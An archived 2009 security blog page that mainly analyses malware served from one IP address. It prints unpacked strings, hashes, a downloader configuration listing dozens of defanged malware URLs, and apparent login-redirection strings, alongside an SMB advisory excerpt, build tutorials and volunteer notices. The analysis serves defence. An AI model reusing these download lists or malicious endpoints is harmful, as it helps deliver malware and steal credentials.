    Disclaimer: EvilFingers community is not responsible for any of the information pasted above. Read our Legal section.

    - EF

    Friday, January 16, 2009

    Update: Analysis of 121.12.173.218

    *** From one of our Analysts ***

    Today, I became aware of a new community portal at http://mwm.rising.com.cn/ [via: http://www.thedarkvisitor.com/2009/01/new-interactive-website-tracks-malicious-programs-in-china/].

    It provides some interesting statistics as well as top 5 malicious domains. One of those domains serves exploits that connect to the prior EvilFingers analysis [at http://evilfingers.blogspot.com/2009/01/analysis-of-12112173218.html]. Specifically, I used the jsunpack.jeek.org analysis tool to identify the purpose of the JavaScript and identify several malicious executables.

    Analysis of the iframes at
    alimcma. 3322.org/b107224/b10.htm [analysis at http://jsunpack.jeek.org/dec/go?url=alimcma.3322.org_b107224_b10.htm]
    alimcma .3322.org/a0076159/a07.htm [analysis at http://jsunpack.jeek.org/dec/go?url=alimcma.3322.org_a0076159_a07.htm]

    Shows one executable at qq.18i16.net_exe1_ce.css:
    Sections ( PSÿÕ«ëçà @üV@ wB@ü @ )
    File: MS-DOS executable, MZ for MS-DOS
    Packer: Upack V0.37 -> Dwing,Upack v0.399 -> Dwing,
    Strings:UNPACKED %s\Down_Temp\%d.exe
    Strings:UNPACKED http://121.12.173.218/w/ce.txt
    Size: 2596 bytes,
    MD5: d3e56ea1a1a5f8d7e21cae20a4d63805

    From that executable, we can see that ce.txt is a downloader, and hxxp://121.12.173.218/w/ce.txt reveals additional executables for us to analyze.
    http://jsunpack.jeek.org/dec/go?url=121.12.173.218_baidu.exe
    http://jsunpack.jeek.org/dec/go?url=121.12.173.218_tan_ce.exe

    *** From one of our Analysts ***

    http://jsunpack.jeek.org/dec/go?url=121.12.173.218_baidu.exe:

    Sections ( PS�ի��� @@�C �eC�@ )
    File: MS-DOS executable, MZ for MS-DOS
    Packer: Upack V0.37 -> Dwing,
    Strings:UNPACKED C:\%08X
    Strings:UNPACKED XsMenu.exe
    Strings:UNPACKED .exe
    Strings:UNPACKED SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    Strings:UNPACKED human.exe
    Strings:UNPACKED \human.exe
    Strings:UNPACKED \winhlp32.exe
    Strings:UNPACKED \mmc.exe
    Strings:UNPACKED %windir%\system32\userinit.exe
    Strings:UNPACKED %windir%\system32\mmc.exe
    Strings:UNPACKED http://121.12.173.218/uu
    Strings:UNPACKED %windir%\hh.exe
    Strings:UNPACKED %windir%\system32\calc.exe
    Strings:UNPACKED %windir%\system32\netstat.exe
    Strings:UNPACKED %windir%\system32\edit.com
    Strings:UNPACKED %windir%\system32\command.com
    Strings:UNPACKED %windir%\system32\ftp.exe
    Strings:UNPACKED %windir%\winhlp32.exe
    Strings:UNPACKED %windir%\winhelp.exe
    Strings:UNPACKED %windir%\twunk_32.exe
    Strings:UNPACKED %windir%\twunk_16.exe
    Strings:UNPACKED %s\data.exe
    Strings:UNPACKED %s\pack_%d.exe
    Strings:UNPACKED %s\kill.exe
    Strings:UNPACKED %windir%\system32\winhlp32.exe
    Strings:UNPACKED c:\windows\main.exe
    Strings:UNPACKED ntoskrnl.exe
    Size: 21608 bytes,
    MD5: e8d700f2af2a2048e900e7a0b17c0ef8

    http://jsunpack.jeek.org/dec/go?url=121.12.173.218_tan_ce.exe:

    Sections ( .nsp0 .nsp1 .nsp2 )
    File: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
    Packer: NsPack 2.9 -> North Star,
    Size: 5368 bytes,
    MD5: f095d29bc1f6d49bdc295e19dae07d1a

    Tsk, tsk, tsk... 121.12.173.218 is so naughty and their ISP still lets them do it...

    - EF

    Hack In The Box Security Conference 2009 - Dubai

    When it comes to InfoSec and Hacking, HITB has been one among the top-notch conferences. Here is their next conference @ Dubai.

    *** Pasted Snippet ***

    Welcome to the official homepage of HITBSecConf2009 - Dubai. The main aim of the HITBSecConf conference series is to create a truly technical and deep knowledge event in order to allow you to learn first hand on the security threats you face in todays super connected world. The HITBSecConf platform is used to enable the dissemination, discussion and sharing of critical network security information.

    Presented by respected members of both the mainstream network security arena as well as the underground or black hat community, our events routinely highlight new and ground-breaking attack and defense methods that have not been seen or discussed in public before. HITBSecConf2009 - Dubai will be our 3rd conference in the UAE and is expected to attract over 200 delegates from the GCC, Europe, North America and the Asia Pacific region. Come and learn from some of the leading experts in the network security arena.

    HITBSecConf2009 - Dubai will also see our highly popular attack-only Capture The Flag competition being organized once again. This years contest will also include an additional binary reversing challenge as well! We believe HITBSecConf is an ideal platform for leading network security vendors to not only meet with some of the leading network security specialists but to also showcase their own technology and solutions with the public as well.

    Venue: Sheraton Dubai Creek,
    Baniyas/Creek Road,
    Dubai, UAE

    Technical Training - DAY 1 and DAY 2
    Date: 20th and 21st April 2009
    Time: 0900 - 1700

    TECH TRAINING 1 - Web Application Security - Threats and Countermeasures
    TECH TRAINING 2 - 802.11 Ninjitsu
    TECH TRAINING 3 - The Exploit Laboratory 3.0

    Conference DAY 1 and DAY 2
    Date: 22nd and 23rd April 2009
    Time: 0900 - 1700

    Dual Track Conference
    Capture The Flag (CTF)

    *** Pasted Snippet ***

    We are proud to partner HITB conferences, being their supporting organization.

    - EF

    Thursday, January 15, 2009

    Analysis of 121.12.173.218

    DISCLAIMER:
    KINDLY DO NOT VISIT ANY OF THE OBFUSCATED LINKS LISTED HERE, AS THEY WILL AFFECT YOUR SYSTEM. WE ARE NOT RESPONSIBLE OR IN CHARGE OF ANY POSSIBLE EFFECTS IF YOU ARE CLICKING ON THE FOLLOWING DESPITE THIS WARNING. READ OUR LEGAL SECTION BEFORE TRYING TO CONTACT US. THE DATA IN THIS SECTION OR IN ANY SECTION OF WWW.EVILFINGERS.COM ARE SOLELY FOR EDUCATIONAL PURPOSE.


    121.12.173.218 has been really mischievous.

    Following were some of the EXE's found upon analysis:
    hxxp://121.12.173.218/6666.txt
    and
    hxxp://121.12.173.218/tan/ms.exe
    Sections ( .nsp0 .nsp1 .nsp2 )
    File: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
    Packer: NsPack 2.9 -> North Star,
    Size: 5368 bytes,
    MD5: 45763bb0ea1fcd247a52bacd3124ea35

    http://www.robtex.com/dot/121.12.173.218,121.8.0.0/13,AS4134,baidu-bai6.cn,baidu-baidudou4.cn,baidu-baiduyi.cn,baidu-baiduyi1.cn,baidu-baiduyi2.cn,baidu-baiduyi3.cn,baidu-baiduyi4.cn,baidu-baiduyi5.cn,baidu-baiduyi6.cn,baidu-baiduzi1.cn,baidu-baiduzi3.cn,baidu-baiduzi4.cn,baidu-baiduzi5.cn,baidu-baiduzi6.cn,baidu-baiduzi7.cn,baidu-baiduzi8.cn,baidu-baiguo9.cn,baidu-du8.cn,baidu-dudouai1.cn,baidu-dudouai10.cn,baidu-dudouai2.cn,baidu-dudouai4.cn,baidu-dudouai5.cn,baidu-dudouai6.cn,baidu-dudouai7.cn,baidu-dudouai8.cn,baidu-dudouai9.cn,baidu-opop.cn,baidu-opop2.cn,baidu-opop3.cn,baidu-opop4.cn,baidu-opop5.cn,baidu-opop6.cn,baidu-opop7.cn,baidudskllkjl.cn,baiduduyou.cn,baiduduyou1.cn,baiduduyou10.cn,baiduduyou11.cn,baiduduyou2.cn,baiduduyou3.cn,baiduduyou4.cn,baiduduyou5.cn,baiduduyou6.cn,baiduduyou7.cn,baiduduyou8.cn,baiduduyou9.cn,baidujkljlxx.cn,baiduybaiduio.cn,baiduyuxire.cn,baiduyuxirebn.cn,googlesemdication.cn,googlesyndixation.cn,googlesyndization.cn,qq.18i16.net!0NET1,1AS2,3A0,4A0,5A0,6A0,7A0,8A0,9A0,10A0,11A0,12A0,13A0,14A0,15A0,16A0,17A0,18A0,19A0,20A0,21A0,22A0,23A0,24A0,25A0,26A0,27A0,28A0,29A0,30A0,31A0,32A0,33A0,34A0,35A0,36A0,37A0,38A0,39A0,40A0,41A0,42A0,43A0,44A0,45A0,46A0,47A0,48A0,49A0,50A0,51A0,52A0,53A0,54A0,55A0,56A0,57A0!2.png

    Anubis Analysis Report for 6666.txt

    Anubis Analysis Report for ms.exe

    6666.txt calls for a multitude of bad guys to continue this process:


    6666.txt called 35 EXE's to malware species:
    [file]
    open=y
    url1=hxxp://a.baidu-6661.com/newadsadsxk/newads01.exe
    url2=
    url3=hxxp://a.baidu-6661.com/newadsadsxk/newads03.exe
    url4=
    url5=hxxp://a.baidu-6661.com/newadsadsxk/newads05.exe
    url6=hxxp://a.baidu-6661.com/newadsadsxk/newads06.exe
    url7=hxxp://a.baidu-6661.com/newadsadsxk/newads07.exe
    url8=hxxp://a.baidu-6661.com/newadsadsxk/newads08.exe
    url9=hxxp://a.baidu-6661.com/newadsadsxk/newads09.exe
    url10=hxxp://a.baidu-6661.com/newadsadsxk/newads10.exe
    url11=
    url12=hxxp://a.baidu-6661.com/newadsadsxk/newads12.exe
    url13=hxxp://a.baidu-6661.com/newadsadsxk/newads13.exe
    url14=hxxp://a.baidu-6661.com/newadsadsxk/newads14.exe
    url15=hxxp://a.baidu-6661.com/newadsadsxk/newads15.exe
    url16=hxxp://a.baidu-6661.com/newadsadsxk/newads16.exe
    url17=hxxp://a.baidu-6661.com/newadsadsxk/newads17.exe
    url18=hxxp://a.baidu-6661.com/newadsadsxk/newads18.exe
    url19=hxxp://a.baidu-6661.com/newadsadsxk/newads19.exe
    url20=hxxp://a.baidu-6661.com/newadsadsxk/newads20.exe
    url21=hxxp://a.baidu-6661.com/newadsadsxk/newads21.exe
    url22=hxxp://a.baidu-6661.com/newadsadsxk/newads22.exe
    url23=
    url24=hxxp://a.baidu-6661.com/newadsadsxk/newads24.exe
    url25=hxxp://a.baidu-6661.com/newadsadsxk/newads25.exe
    url26=hxxp://a.baidu-6661.com/newadsadsxk/newads26.exe
    url27=hxxp://a.baidu-6661.com/newadsadsxk/newads27.exe
    url28=hxxp://a.baidu-6661.com/newadsadsxk/newads28.exe
    url29=hxxp://a.baidu-6661.com/newadsadsxk/newads29.exe
    url30=hxxp://a.baidu-6661.com/newadsadsxk/newads30.exe
    url31=
    url32=hxxp://a.baidu-6661.com/newadsadsxk/newads32.exe
    url33=hxxp://a.baidu-6661.com/newadsadsxk/newads33.exe
    url34=
    url35=hxxp://a.baidu-6661.com/newadsadsxk/newads35.exe
    count=35

    Analysis of one of the files that 6666.txt calls (hxxp://a.baidu-6661.com/newadsadsxk/newads01.exe)

    Sections ( .Upack .rsrc )
    File: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
    Packer: Upack V0.37 -> Dwing,Upack_Patch or any Version -> Dwing,WinUpack v0.39 final (relocated image base) -> By Dwing (c)2005 (h2),
    Strings:UNPACKED expl$aorer.exe
    Strings:UNPACKED /cczongxz/shpost5.asp
    Strings:UNPACKED /test/erge1128/post.asp
    Strings:UNPACKED /cczongxz/mibao.asp
    Strings:UNPACKED shcsrss.exeEvent
    Strings:UNPACKED svchost.exe
    Strings:UNPACKED csrss.exe
    Strings:UNPACKED csrss.exeMutex
    Strings:UNPACKED http://$a%s$a:%d%s?%s
    Strings:UNPACKED 21$a2.103$a.11.59 passpo$art.wanmei.com
    Strings:UNPACKED 212.1$a03.11.59 re$ag.163.c$aom
    Strings:UNPACKED 21$a2.103.11.59 sde.ga$ame.sohu.com
    Strings:UNPACKED 212.10$a3.11.59 ac$acount.ztgame.com
    Strings:UNPACKED 212.103.11.59 pwd.s$ado.com
    Strings:UNPACKED 2$a12.103.11.59 r$aeg.91.com
    Strings:UNPACKED 21$a2.103$a.11.59 pass.kin$agsoft.com
    Strings:UNPACKED 212$a.103.11.59 pa$assport.y$auyan.com
    Strings:UNPACKED my.exe
    Strings:UNPACKED r05022.exe
    Strings:UNPACKED rundll32.exe
    Size: 13083 bytes,
    MD5: 4375b512ce566f970d51c7ff75ae3846

    Anubis Report for hxxp://a.baidu-6661.com/newadsadsxk/newads01.exe

    This is of course old news for many, based on ShadowServer reports and other stuff that has been notifying on IE7 0-day exploit. The interesting part is, this site is still active and still running these malwares...

    - EF

    Simpler the better...

    www.MalwareAnalytics.com - The science of Malware Analysis.


    Coming soon... If you wish to volunteer or contribute in this division of EvilFingers, and if you qualify the following constraints kindly email us at contact.fingers @ gmail.com:

    You are experienced in this field (directly or indirectly) and you can do tasks autonomously without any assistance, once the project or task is assigned and explained to you.

    You are willing to submit your real profile to us to understand your experience(Linkedin, for example). We guarantee not to release it, if you do not want us to.

    You agree NOT to bring in your corporate work or corporate information into our team, because we definitely do not wish to get involved with any type of corporate infringements, copyrights or intellectual property issues.

    Your ideas that you bring in for the team will be solely yours and not your company's tool or something of that sort.

    You will dedicate some time for some serious contribution/volunteering, since you understand that everyone in the team is a volunteer and we are all working towards raising the par of information security.

    You will cooperate with other volunteers in the same team, though without bothering others or do stuff that would increase their time of contribution or load the others with their work.

    You agree to submit your work, both source and all files researched including the volunteering schedule, and anything else that you have collected, created or researched during the process.



    And more...

    Contact us if you have any questions, reviews or anything at all. contact.fingers @ gmail.com [Because GMAIL Rocks!!!]...

    - EF

    Globalization: Pros & Cons...

    Globalization is the term used for outsourcing projects and working with Multi-National companies. Though, people look for instant cash/money in exchange for work and since Globalization started promising such deals, people do not see the fact or did not calculate it prior to such failures.

    When you depend on someone or something for a long term, and if that someone or something fails, so will you. Theory of transitivity applies to all such situations.

    B depends on A

    IF A ->(tends to) Success THEN B -> Success too.
    IF A -> Failure THEN B -> Failure too.

    How come, this small logic was never thought about until people saw failure? This does not mean Globalization should be stopped. This just means that there are both Pros & Cons for everything, just like 2 sides of the same coin.

    - EF

    Video Section: Call for Volunteers

    We are looking for people who would be willing to make our video section active. We are coming up with 2 possible ways to contribute for our video section. 1 is to come up with a weekly and a monthly theme, where our volunteer would be able to pick our theme for the week or the month and make their videos fall under that umbrella. On the other case, we would also have a generic video section going parallel to the theme in category based listings and hence your video would be listed on the various categories if not under the theme. Even if there is no category for your video currently, we promise to make one for you.

    We also would be submitting our quality videos to our partner www.TheAcademyPro.com and their Home Edition too, depending on the category of the video. Please do not hesitate to shoot us an email at contact.fingers @ gmail.com[BECAUSE GMAIL ROCKS!!!] for any further questions.

    - EF

    Wednesday, January 14, 2009

    Malware attack via Internet

    Far away were actions typical of old viruses, whose methods malicious of infection consisted were in specific modules attack that are propagated through a diskette. In this part of history, the situation changed dramatically and the malware found on the Internet to channel ideal half the stronger and more effective attacks.

    Under this issue, one of the methods used is to run malicious code on a transparent to the user, at the very moment that accesses a particular website. One of the techniques used is Drive-by-Download.

    The attack is canalized, generally, through the injection of iframe labels, in the body of HTML code, that opens of way transparent and parallel to the opening of the original page, another page that contains one or several scripts obfuscated.

    Each of these malicious scripts hides one or several exploits to take charge of searching, in the victim equipment, the specific vulnerability for which they were developed.

    When the user accesses the page breached can see, for example, a single point in the browser window. Something like this:


    But when you look at the source of the page shows the injected code, similar to the following:

    However, not all are bad omens because there are countermeasures to mitigate such attacks effectively, and as simple as reading this text. The countermeasure is simply update the information environment with security updates.

    # Jorge Mieres

    Ataque de malware vía web

    Lejos quedaron las acciones típicas de los viejos virus informáticos, cuyos métodos dañinos de infección consistían en módulos de ataque específicos que se propagaban a través de algún disquete. En esta parte de la historia, la situación a cambiado radicalmente y el malware a encontrado en Internet un medio ideal para canalizar mayores y más efectivos ataques.

    Bajo este aspecto, uno de los métodos más utilizadas consiste en ejecutar código malicioso de manera transparente para el usuario, en el preciso momento en que este accede a determinado sitio web. Una de las técnicas más utilizada es el Drive-by-Download.

    El ataque se canaliza, por lo general, a través de la inyección de etiquetas iframe, en el cuerpo del código HTML, que abren de manera transparente y paralela a la apertura de la página vulnerada, otra página que contiene uno o varios scripts sometidos a ofuscación.

    Cada uno de estos scripts maliciosos esconden uno o varios exploits que se encargaran de buscar, en el equipo víctima, la vulnerabilidad específica para la cual fueron desarrollados.

    Cuando el usuario accede a la página vulnerada puede ver, por ejemplo, un simple punto en toda la ventana del navegador. Algo parecido al siguiente:


    Pero, cuando se observa el código fuente de la página se observa el código inyectado, similar al siguiente:

    Sin embargo, no todo son malos augurios ya que existen contramedidas que permiten mitigar este tipo de ataques de manera eficaz, y tan sencilla como leer este texto. La contramedida es, simplemente, mantener actualizado el entorno de información con las actualizaciones de seguridad.

    # Jorge Mieres

    Tuesday, January 13, 2009

    Vulnerabilities in SMB Could Allow Remote Code Execution (958687): MS09-001

    Vulnerabilities in SMB Could Allow Remote Code Execution (958687): MS09-001

    ******PASTED FROM OFFICIAL SITE******

    Executive Summary
    This security update resolves two privately reported vulnerabilities and one publicly disclosed vulnerability in Microsoft Server Message Block (SMB) Protocol. The vulnerabilities could allow remote code execution on affected systems. An attacker who successfully exploited these vulnerabilities could install programs; view, change, or delete data; or create new accounts with full user rights. Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.

    This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, and Windows Server 2003, and Moderate for all supported editions of Windows Vista, and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.

    The security update addresses the vulnerabilities by validating the fields inside the SMB packets. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.

    Recommendation. Microsoft recommends that customers apply the update immediately.

    Known Issues. None

    ******PASTED FROM OFFICIAL SITE******

    - EF

    Possible questions for a siltent patchTuesday

    Microsoft has announced 1 critical bulletin that can be found at http://www.microsoft.com/technet/security/Bulletin/MS09-jan.mspx.

    Does this mean we are safe?
    OR
    Does this mean that MS is releasing patches silently without releasing it in detail to common public, for them to know about how things work ?

    It makes sense in both cases, since not everyone would know every single thing they are vulnerable to, especially when they are concentrating on how to expand further by creating a new technology and a new OS when they do not even have time to fix the stuff that is vulnerable in their past OS and components.

    Secondly, it is their product and hence they have license to update and fix their product without making a public disclosure of it.

    Hence, it makes sense either way.

    - EF

    Monday, January 12, 2009

    Malware Analytics


    www.MalwareAnalytics.(com|org|net) coming soon... So far PE analysis (1% of Malware Analytics) is complete and the team is currently working on other stuff (as seen below):



    Kirk McGraw is responsible for Rootkit research and Giuseppe Bonfa is running the Malware research.

    - EF

    Saturday, January 10, 2009

    Security in Web browsers

    Late last year the community EvilFingers revealed a number of known vulnerabilities in the Web browser Google Chrome as MetaCharacter URI ofuscation by which an attacker could manipulate the features of the browser and redirect requests, or mismanagement of library "chrome.dll" that helping "throw" the browser, among others. While it are a PoC, reflect the level of vulnerability of Web applications.

    It seems that Google responded to the call and has launched, of the hand of Michal Zalewski, the Polish that revealed many of the vulnerabilities found in Internet Explorer and Firefox (Chrome also likely), a Safety Manual for browsers.

    The manual explains a lot of security features that have the most common browsers and is an excellent reference material.

    # Jorge Mieres

    Seguridad en los navegadores web

    A finales del año pasado la comunidad EvilFingers nos daba a conocer una serie de vulnerabilidades en el navegador web Google Chrome como el ofuscamiento de metacaracteres URI mediante la cual un atacante podría manipular las funcionalidades del navegador y redireccionar las peticiones, o la mala gestión de la librería “chrome.dll” que permite "tirar" el navegador, entre otras tantas.

    Si bien no dejan de ser PoC, reflejan el nivel de vulnerabilidad de las aplicaciones web. Parece ser que Google respondió al llamado y hace un tiempo ha lanzado, de la mano de Michal Zalewski, el polaco que reveló muchas de las vulnerabilidades encontradas en Internet Explorer y Firefox (seguramente también en Chrome), un Manual de Seguridad para Navegadores.

    El manual explica una gran cantidad de características de seguridad que poseen los navegadores más comúnes y más utilizado, constituyendo un excelente material de consulta.

    # Jorge Mieres

    Kris Kaspersky Publication Translation

    Daniel is our new Russian translator who is actively working with us to preliminarily help with the publication translation and later work on translating our entire EN site to RU for www.EvilFingers.ru.

    We are requiring some English candidates, who are good with reviewing articles to ensure that the translation would make sense in English and this was requested by Daniel himself. Hence, if you would like to volunteer for this particular task, you are most welcome to do so.

    Contact us at contact.fingers @ gmail.com if you have any further questions.

    - EF

    Friday, January 9, 2009

    NtSetDebugFilterState as Anti-Dbg Released

    Hi,

    Released a paper by Giuseppe 'Evilcry' Bonfa' on NtSetDebugFilterState Reverse Engineering and use as Anti Debug Trick.

    You can reach it here:

    http://evilfingers.com/publications/research_EN/NtSetDebugFilterState.pdf

    Regards

    Commonly exploited security weaknesses

    Many attacks that an environment can suffer for the sole reason of being part of the World Web Wide, so it is necessary to centralize all efforts to improve strategic and proactive manner all aspects representing a potential point attack without neglecting those most trivial.

    Therefore, we have written a new paper that explains the importance of attending to every aspect of security with the same level of acuity, for this seems more common.

    In the Publications section of EvilFingers.com, will find this new source of information in Spanish, or if you wish, you can download it from here.

    Thinking about those who do not entirely dominate the Spanish language, will soon be available in English.

    # Jorge Mieres

    Debilidades de seguridad comúnmente explotadas

    Muchos son los ataques que un entorno informático puede sufrir por la sola razón de formar parte de la gran red de redes, por lo tanto, es necesario centralizar todos los esfuerzos en mejorar de manera estratégica y proactiva todos los aspectos que representan un potencial punto de ataque sin descuidar aquellos aspectos más triviales.

    Por tal motivo, hemos escrito un nuevo paper que explica la importancia de atender a cada aspecto de seguridad con el mismo nivel de agudeza, por más común que este parezca.

    En la sección Publications de EvilFingers.com, encontrarán este nuevo recurso de información en español, o si lo desean, pueden descargarlo desde aquí.

    Pensando en aquellos que no dominan del todo la lengua hispana, muy pronto estará disponible también en inglés.

    # Jorge Mieres

    We give up...

    After a consistent argument for almost 3 yrs with the Corporate world(Private & Gov Sectors) for the word "Evil" in www.EvilFingers.com, we give up finally and thought that it is not worth arguing anymore.

    We have now registered www.SecInternals.com for our professional front of www.EvilFingers.com to help the corporate world with free community based security research. This site should be up pretty soon with a commercial design...

    Stay in touch for further update, or contact us at contact.fingers @ gmail.com for any questions.

    - EF

    How to create a dll

    If you are interested in this post then I assume that you know what is a dll, if not you can find a definition here.

    Below I will give you an empty framework of what you need to create a dll.

    There are two files: mylib.c (that contains your functions) and mylib.def that contains the functions that you want to make accessible for other programs (the exported functions).

    mylib.c
    #include "stdio.h"

    __declspec(dllexport) int __stdcall myFunc()
    {
    printf("Text from my dll\n");
    return 0;
    }


    __declspec(dllexport) int __stdcall DllMain()
    {
    return 0;
    }

    The mylib.def will contain:
    LIBRARY mylib
    EXPORTS
    myFunc

    Now you need to compile your mylib.c file with the following switches:
    cl mylib.c /LD /O2 /Gz /GD /W3 /link advapi32.lib /DLL /NOLOGO /DEF:mylib.def /RELEASE

    Enjoy :)

    - From ExpertSec

    How to create a native application in C

    First, read this article. So, you will only need a Windows DDK (Driver Development Kit).
    After that, you need to create 2 files in your working directory:
    makefile
    !INCLUDE $(NTMAKEENV)\makefile.def

    and
    sources
    TARGETNAME=myprog
    TARGETPATH=OBJ
    TARGETTYPE=PROGRAM
    SOURCES=myprog.c



    Now create your myprog.c file and don't forget to use only Native API's. When you're done, run the checked/free windows ddk command prompt, go to your working folder and type the following command:

    build

    If everything was ok, you should have a new folder (like objchk_wxp_x86, objfree_wxp_x86, etc) with an exe in it. Btw, don't forget that you can't run it like a normal windows app!

    Enjoy :)

    - Expertsec.com

    Thursday, January 8, 2009

    Feedback Time

    "Be it shitty or be it nice,
    send your feedback for it would be wise."

    We respect your time and precious response to our work, without which we are blind men swimming across the English channel. We really fix our needs and requirements based on the interaction with you, our users.

    So, kindly email us at contact.fingers @ gmail.com with any reports, advices, requirements or compliments, etc. Be it good or be it bad, do contact us.

    - EF

    Wednesday, January 7, 2009

    Malware Analysis Team: CastleCops Volunteers Invited

    Rajdeep has left the team due to personal reasons. He was the lead of the user base section of malware analysis, to run the forum, welcome user base and collect malware information and so on. We now need a new person to fill in the position. We are looking for someone with prior experience of doing the same.

    Since, CastleCops has closed recently, we are also giving a warm welcome to the CastleCops volunteers. If you think that you would like to do something similar or something different we would like to work with you and help you in the process. Kindly, contact us at contact.fingers @ gmail.com.

    - EF